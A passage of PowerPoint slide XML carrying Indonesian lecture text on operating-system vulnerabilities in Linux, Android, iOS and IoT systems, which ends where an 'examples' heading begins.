            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> rasa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>puas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS server yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lazim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS desktop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Sifat Linux yang open-source dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kernel, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di Linux. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Terlepas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>reputasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meluas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Adopsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meluas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Android dan iOS dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tradisional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berharga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diserang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Linux, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manfaat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, OS Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terfragmentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. iOS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Android, juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pentingnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilebih-lebihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperkenalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
